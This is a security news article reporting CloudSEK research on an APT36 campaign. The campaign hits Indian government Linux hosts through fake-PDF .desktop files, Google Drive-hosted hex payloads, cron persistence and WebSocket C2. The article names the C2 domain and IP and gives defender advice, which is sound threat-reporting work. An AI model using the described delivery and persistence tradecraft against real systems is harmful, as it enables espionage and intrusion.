Beyond Windows: Pakistan’s APT36 Group Is Now Attacking Linux Systems with Stealthy Malware

The Pakistan-linked threat group APT36—also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major—has re-emerged with a new malware delivery technique targeting Indian defense and government entities. According to researchers at CloudSEK, the group is evolving its tactics by leveraging Linux .desktop files and Google Drive-hosted payloads to bypass defenses and achieve persistence.

As the report highlights, “APT36 is well known for its persistent phishing campaigns and credential-harvesting operations used to gain access to sensitive environments.”

The campaign begins with phishing emails carrying ZIP archives containing malicious .desktop files disguised as PDF documents. For instance, a file named PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop appears to be a routine procurement document but hides a malicious execution command.

CloudSEK explains: “When executed, the loader downloads a dropper payload from Google Drive, stored there as hex-encoded strings.”

The infection chain includes:

1. Decoding a payload from Google Drive into the /tmp directory.
2. Assigning execute permissions and running the binary in the background.
3. Opening a decoy PDF in Firefox to distract the victim while the malware silently operates.

Once executed, the dropper performs multiple stealth operations:

• Anti-analysis checks – running loops to evade sandboxes and debugging tools.
• Persistence – adding itself to autostart or cron jobs to ensure survival after reboots.
• Fake appearances – disguising itself as a legitimate PDF shortcut with embedded Base64 icons.

The sophistication lies in hiding malware commands within desktop configuration metadata, a tactic rarely seen in Linux-targeted espionage.

The final payload, a Go-based ELF binary, establishes a C2 connection using WebSockets. Researchers found it continually beaconing to:

• C2 Domain: seemysitelive[.]store
• C2 IP: 164.215.103.55 (ASN: AS213373, IP Connect Inc)

CloudSEK’s analysis revealed: “The loop at the end is critical: that Base64 blob decodes to a WebSocket URL (ws://seemysitelive[.]store:8080/ws). The client continually tries to connect to it.”

This use of non-standard protocols (port 8080 WebSockets) allows APT36 to maintain stealthy control over infected hosts while complicating detection efforts.

APT36 has been active since at least 2013, with a long history of targeting Indian government, defense personnel, and strategic organizations. The use of Google Drive to deliver malicious payloads marks an evolution in their capabilities, blending trusted cloud services into their attack lifecycle.

The report warns: “The use of Google Drive in their attack lifecycle represents a significant evolution in the threat group’s capabilities, introducing spearphishing vectors that pose higher risks to Linux-based government and defense infrastructure.”

The new APT36 campaign demonstrates a clear tactical shift toward targeting Linux environments with disguised .desktop files, cloud-based payload delivery, and evasive WebSocket C2 infrastructure.

As CloudSEK concludes, “APT36 attacks focus on government and defense personnel, risking leakage of sensitive defense and strategic information that can compromise national security and organizational confidentiality.”

For defenders, this underscores the need for enhanced phishing awareness, scrutiny of Linux shortcut files, and monitoring of outbound WebSocket traffic to identify stealthy APT activity.

Related Posts:

• Researcher Exposes WebSockets’ Role in Credit Card Skimming
• Linux Under Attack: APT36 Launches New Cyber-Espionage Campaign on Indian Govt
• APT36 Suspected in India Gov Spoofing Phishing with ClickFix Tactics
• PrestaShop Websites Under Attack: GTAG Websocket Skimmer Steals Credit Card Data
• APT36 Unleashes Linux Malware: Transparent Tribe Targets Indian Government with Go-Based Espionage Tools